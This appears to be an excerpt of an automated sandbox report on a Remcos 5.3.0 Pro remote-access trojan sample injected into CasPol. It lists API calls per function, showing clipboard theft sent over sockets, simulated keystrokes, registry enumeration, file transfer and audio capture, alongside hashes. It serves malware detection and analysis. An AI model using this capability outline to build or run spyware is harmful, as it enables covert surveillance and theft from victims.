                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                  • _free.LIBCMT ref: 00444724
                                                                                                                  • _free.LIBCMT ref: 0044473D
                                                                                                                  • _free.LIBCMT ref: 0044476F
                                                                                                                  • _free.LIBCMT ref: 00444778
                                                                                                                  • _free.LIBCMT ref: 00444784
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                  • String ID: C
                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                  • Opcode ID: 5965148e21f94246bac9ccb3101c09a42f94ab2750877138e5eb6e840989efb8
                                                                                                                  • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                  • Opcode Fuzzy Hash: 5965148e21f94246bac9ccb3101c09a42f94ab2750877138e5eb6e840989efb8
                                                                                                                  • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tcp$udp
                                                                                                                  • API String ID: 0-3725065008
                                                                                                                  • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                  • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                  • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                  • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 1414292761-661517699
                                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm$h(RA/
                                                                                                                  • API String ID: 1170836740-2974360138
                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                  • String ID: .part
                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                  • Opcode ID: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                  • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                  • Opcode Fuzzy Hash: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                  • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                    • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                    • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                  • _wcslen.LIBCMT ref: 0041A906
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                  • API String ID: 3286818993-703403762
                                                                                                                  • Opcode ID: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                  • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                  • Opcode Fuzzy Hash: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                  • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                  APIs
                                                                                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                  • API String ID: 4067487056-2527699604
                                                                                                                  • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                  • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                  • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                  • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                  • __freea.LIBCMT ref: 00449B47
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • __freea.LIBCMT ref: 00449B50
                                                                                                                  • __freea.LIBCMT ref: 00449B75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864826663-0
                                                                                                                  • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                  • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                  • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                  • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                  APIs
                                                                                                                  • SendInput.USER32 ref: 00418B18
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                    • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1167301434-0
                                                                                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                  • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                  • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32 ref: 00415A46
                                                                                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2172192267-0
                                                                                                                  • Opcode ID: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                  • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                  • Opcode Fuzzy Hash: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                  • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16
                                                                                                                  • String ID: a/p$am/pm$fD
                                                                                                                  • API String ID: 3509577899-1143445303
                                                                                                                  • Opcode ID: b7a8f278bf47528e4a7b6c0293cf3492489fb7de6840faf8b14e2fc4a7d4cdfd
                                                                                                                  • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                  • Opcode Fuzzy Hash: b7a8f278bf47528e4a7b6c0293cf3492489fb7de6840faf8b14e2fc4a7d4cdfd
                                                                                                                  • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                  • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                  • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                  • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • _free.LIBCMT ref: 00444096
                                                                                                                  • _free.LIBCMT ref: 004440AD
                                                                                                                  • _free.LIBCMT ref: 004440CC
                                                                                                                  • _free.LIBCMT ref: 004440E7
                                                                                                                  • _free.LIBCMT ref: 004440FE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                  • String ID: Z7D
                                                                                                                  • API String ID: 3033488037-2145146825
                                                                                                                  • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                  • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                  • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                  • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                  • __fassign.LIBCMT ref: 0044A190
                                                                                                                  • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1324828854-0
                                                                                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                  • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                  • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                  APIs
                                                                                                                  • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                    • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                    • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                    • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                    • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                    • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                  • String ID: T=G$>G$>G
                                                                                                                  • API String ID: 1596592924-1617985637
                                                                                                                  • Opcode ID: 3fec3df3ea753e99a4d7dc9a7f1cf411dfa94176a259d892051fe4c4deaceef9
                                                                                                                  • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                  • Opcode Fuzzy Hash: 3fec3df3ea753e99a4d7dc9a7f1cf411dfa94176a259d892051fe4c4deaceef9
                                                                                                                  • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                  • String ID: TUFTUF$>G$DG$DG
                                                                                                                  • API String ID: 3114080316-344394840
